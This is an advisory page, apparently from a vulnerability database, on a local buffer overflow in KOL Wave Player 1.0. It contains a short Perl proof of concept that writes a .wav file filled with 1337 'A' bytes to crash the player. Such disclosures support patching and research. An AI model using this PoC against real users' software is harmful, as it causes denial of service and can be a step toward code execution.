KOL Wave Player 1.0 .wav local buffer overflow

2010.01.28
Credit: cr4wl3rn
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/perl ######################################################### ## Usage-->>file created-->>load file-->>b00m.wav >>>BOOM ######################################################### print "#####################################################\n"; print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC\n"; print "\n"; print "[!] Author: cr4wl3r\n"; print "[!] Mail: cr4wl3r[!]linuxmail.org\n"; print "#####################################################\n"; my $boom = "http://"."\x41" x 1337; my $filename = "b00m.wav"; open (FILE,">$filename"); print FILE "$boom"; print "\nFile successfully created!\n";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top